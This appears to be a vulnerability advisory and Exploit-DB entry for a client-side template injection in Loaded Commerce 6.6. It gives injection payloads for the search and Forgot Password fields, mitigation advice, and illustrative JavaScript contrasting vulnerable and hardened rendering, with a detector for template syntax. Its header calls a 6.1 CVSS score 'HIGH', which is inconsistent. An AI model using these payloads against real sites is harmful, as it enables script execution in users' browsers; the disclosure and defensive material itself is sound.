Vendor: Loaded Commerce
Author: tmrswrr
CVSS: 6.1 (HIGH)
Vulnerability Type: Client-Side Template Injection (CSTI)
CWE: 94
Product Name: Loaded Commerce
Affected Version From: 6.6
Affected Version To: 6.6
Patch Exists: NO
CPE: a:loadedcommerce:loaded_commerce:6.6
Platforms Tested: https://www.softaculous.com/apps/ecommerce/Loaded_Commerce
Year: 2025

Loaded Commerce 6.6 Client-Side Template Injection (CSTI)

The proof of concept injects {{7*7}} into the search parameter of Loaded Commerce 6.6; the expression is evaluated rather than displayed, confirming a client-side template injection vulnerability. Similarly, submitting {{constructor.constructor('alert(1)')()}} in the email field on the 'Forgot Password' page triggers client-side code execution.

Mitigation:

To mitigate this vulnerability, validate and sanitize user-supplied input before it is reflected into the page, so that template syntax in the search keyword or email field is rendered as plain text and never compiled as a template expression.
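As an added illustration of the vulnerable and hardened rendering paths (example code, not from the advisory or from Loaded Commerce itself; it assumes an Angular-style {{ }} interpolation engine, modelled here by a toy evaluator):

```javascript
// Added example, not part of the advisory or of Loaded Commerce's code.
// A toy client-side template engine stands in for whatever {{ }} engine the
// storefront uses (assumption: Angular-style double-curly interpolation).
// It shows why reflecting the search keyword into the template source is
// dangerous, the hardened rendering path, and a simple boundary check.

// Toy {{ expr }} interpolator. Real engines differ, but the failure mode is
// the same: anything that ends up inside the template SOURCE gets compiled.
function renderTemplate(source, scope) {
  return source.replace(/\{\{([\s\S]+?)\}\}/g, (_, expr) =>
    String(new Function('with (this) { return (' + expr + '); }').call(scope)));
}

// Standard HTML escaping so the bound value cannot break out as markup either.
function escapeHtml(s) {
  return s.replace(/[&<>"']/g, (c) =>
    ({ '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' }[c]));
}

// Vulnerable pattern: the keyword is concatenated into the template before it
// is compiled, so "{{7*7}}" renders as "49" (the advisory's proof of concept).
function vulnerableSearchPage(keywords) {
  const template = '<h1>Results for ' + keywords + '</h1>';
  return renderTemplate(template, {});
}

// Hardened pattern: the template is a constant and the keyword is supplied as
// DATA through a binding. The engine emits the bound value as text and does
// not re-interpolate it, so "{{7*7}}" is displayed literally.
function hardenedSearchPage(keywords) {
  const template = '<h1>Results for {{ keywords }}</h1>';
  return renderTemplate(template, { keywords: escapeHtml(keywords) });
}

// Boundary check for validation or logging: flags values that carry template
// delimiters, which have no legitimate place in a search keyword or email.
function containsTemplateSyntax(value) {
  return /\{\{[\s\S]*\}\}/.test(value);
}

// Demonstration on constructed inputs.
console.log(vulnerableSearchPage('{{7*7}}')); // <h1>Results for 49</h1>
console.log(hardenedSearchPage('{{7*7}}'));   // <h1>Results for {{7*7}}</h1>
console.log(containsTemplateSyntax('{{7*7}}'), containsTemplateSyntax('shoes'));
```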

Exploit-DB raw data:

# Exploit Title: Loaded Commerce 6.6 Client-Side Template Injection (CSTI)
# Date: 03/13/2025
# Exploit Author: tmrswrr
# Vendor Homepage: https://loadedcommerce.com/
# Version: 6.6
# Tested on: https://www.softaculous.com/apps/ecommerce/Loaded_Commerce

Injecting {{7*7}} into the search parameter 
https://demos1.softaculous.com/Loaded_Commerce/index.php?rt=core%2Fadvanced_search_result&keywords={{7*7}}
returns 49, confirming a template injection vulnerability.

Forgot Password:
Submitting {{constructor.constructor('alert(1)')()}} in the email field on the "Forgot Password" page
https://demos1.softaculous.com/Loaded_Commerce/index.php?rt=core/password_forgotten&action=process
triggers an alert, demonstrating client-side code execution.